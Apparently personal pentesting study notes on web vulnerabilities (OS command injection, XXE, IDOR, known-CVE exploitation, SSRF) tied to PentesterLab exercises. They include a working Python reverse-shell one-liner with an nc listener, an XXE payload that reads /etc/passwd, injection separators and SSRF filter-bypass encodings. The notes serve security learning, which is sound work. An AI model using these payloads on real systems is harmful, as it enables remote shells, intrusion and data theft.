OS Command Injection is server side web vulnerablities where attacker execute π" system command" like id, whoami ,uname etc os command . It is a web vulnerability that allows an attacker to take advantage of that made system call to execute operating system commands on the server.
There are two types of OS command injection such as :
i. Active OS command injection
ii. Blind OS command injection
Active command injection will return the response to the user. It can be made visible through several HTML elements. That means when a attacker execute π "system command " like ls ,server will return result of ls .(Attacker will see the result of ls ) .It is so easy to execute .
OS Command Injection Payloads link:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
\n -------- %0a
%09 ------- tab ------ example:;ls%09-la
{ls,-la} ------ branch expansion -------- example:{ls,-la}
Blind command injection occurs when the system command made to the server does not return the response to the user in the HTML document . That means when a attacker execute " system command " like ls ,server will not return result of ls but server execute ls command . For , seeing the result of π "system command " you must upload reverse shell on target / victim server . After uploading reverse shell on victim server , you must be listen uploaded shell on attacker terminal using nc command .
β₯οΈ 1. upload reverse shell :
; python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
2. listen reverse shell :
nc -lnvp 4242
Note :
1. Change ip according to your local host ip
2. One can easily uploaded shell if OS command injection is occured .
When databases stored as a file it's called "flat-file" .The extension of those file is db . ( like webapp.db , base.db )
Process :
1. At first download " flat-file " from target web app . ( Use dirsearch or gobuster for exposing flat-file directory )
2. Then , expose sensitve data from "flat-file " using sqlite3
Use Of Sqlite3 :
sqlite3 target_file
.schema table_name
select * from table_name ; // see more using sqlite3 command//
An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data.
1. Cause of Denial of Service (DoS) attack
2. Could use XXE to perform Server-Side Request Forgery (SSRF)
3. XXE may even enable port scanning and lead to remote code execution.
1. in-band xxe
2.out-of-band xxe
An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.
out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.
Now we'll see some XXE payload and see how they are working.
The first payload we'll see is very simple. If you have basic knowledge about XML language you can easily understand it :
<!DOCTYPE replace [<!ENTITY name "feast"> ]> <userInfo> <firstName>falcon</firstName> <lastName>&name;</lastName> </userInfo>
As we can see we are defining a ENTITY called name and assigning it a value feast. Later we are using that ENTITY in our code.
We can also use XXE to read some file from the system by defining an ENTITY and having it use the SYSTEM keyword
<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]> <root>&read;</root>
Here again, we are defining an ENTITY with the name read but the difference is that we are setting it value to SYSTEM
and path of the file.
If we use this payload then a website vulnerable to XXE(normally) would display the content of the file /etc/passwd.
In a similar manner, we can use this kind of payload to read other files but a lot of times you can fail to read files in this manner or the reason for failure could be the file you are trying to read.
IDOR, or Insecure Direct Object Reference, is the act of exploiting a misconfiguration in the way user input is handled, to access resources you wouldn't ordinarily be able to access. IDOR is a type of access control vulnerability.
For example, let's say we're logging into our bank account, and after correctly authenticating ourselves, we get taken to a URL like this https://example.com/bank?account_number=1234. On that page we can see all our important bank details, and a user would do whatever they needed to do and move along their way thinking nothing is wrong.
There is however a potentially huge problem here, a hacker may be able to change the account_number parameter to something else like 1235, and if the site is incorrectly configured, then he would have access to someone else's bank information.
ποΈ Conclusion of IDOR : When you change the value of (get /post) parameter , you will see other user information .
Occasionally, you may find that the company/entity that you're pen-testing is using a program that already has a well documented vulnerability.
For example, let's say that a company hasn't updated their version of WordPress for a few years, and using a tool such as wpscan, you find that it's version 4.6. Some quick research will reveal that WordPress 4.6 is vulnerable to an unauthenticated remote code execution(RCE) exploit, and even better you can find an exploit already made on exploit-db.
Process :
1. Analize target website and findout version , name etc of target platform .
2. Then , checkout those versuon ,name are vulnerable or not via exploit db ,rapid7 etc .
3. If target webiste version is vulnerable you can easily hacked your targer website via those process .
Suppose , Our target website like this :
After analyzing , we realize that our target website create by "Nostromo" . Ok , thats great .Now ,follow our previous process :
Search "Nostromo" on exploit db
find out specific exploitation according to our target version (Here , nostromo 1.9.6 )
Then , Download exploit file and execute it
download_file.py target_url id
Here , you can use any linux os command instead of id
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing .
Simply , SSRF is a web vulnerability which help an attacker to get / gain information from target server . Attacker can gain any Data from Sever for that It's called Server Side Request Forgery .
- Attacker can unauthorized action or access
- Attacke can see any data of server
- Attacker can execute 3rd party mallicious website
Step 1 : At first findout any get parameter that is use for data loaded ( Like url,data,id ) Suppose , you have this website http://ptc-b59f8e4f-a516ccb2.libcurl.so/
After , recon you find get parameter of this website http://ptc-b59f8e4f-a516ccb2.libcurl.so/?url
Now , you can test LFI, RFI And SSRF on this website
Step 2: Use loopback ip after target url and use port number
You will see information of 1234 port
There are two main types of SSRF protection mechanisms out there:
blacklists and
Blacklists refer to the practice of not allowing certain addresses and blocking the request if a blacklisted address was received as input. Most SSRF protection takes the form of blacklisting internal network address blocks.
On the other hand, whitelists mean that a server would only allow through requests that contain URLs on a prespecified list and fail all other requests
1.Try using IPv6 addresses instead of IPv4
2.Use Hex Encoding instead of Decimal number (http://0x7f.0x0.0x0.0x1)
3.Use Octal Encoding insted of Decimal number (http://0177.0.0.01)
4.Use Dword Encodinf( http://2130706433)
5.Use URL Encoding (%6c%6f%63%61%6c%68%6f%73%74)
6.Use Mixed Encoding (0177.0.0.0x1)
7.Tricking it with DNS
8.Fooling it with redirects
9.Use localhost instead of 127.0.01 (http://localhost:1234)
level 1:http://ptc-e5e344a9-ab23ba80.libcurl.so/?url=https://assets.pentesterlab.com/hacker.txt
level 2:http://ptc-a04fcdce-f9f12764.libcurl.so/?url=https://assets.pentesterlab.com/hacker.txt
level 3:http://ptc-b59f8e4f-a516ccb2.libcurl.so/?url=https://assets.pentesterlab.com/hacker.txt
level 4:http://ptc-50a250d6-842795bb.libcurl.so/?url=https://assets.pentesterlab.com/hacker.txt
1.https://portswigger.net/web-security/ssrf ( Theory about SSRF)
2.https://vickieli.medium.com/bypassing-ssrf-protection-e111ae70727b (Bypass )
3.https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4 (Bypass Payload List )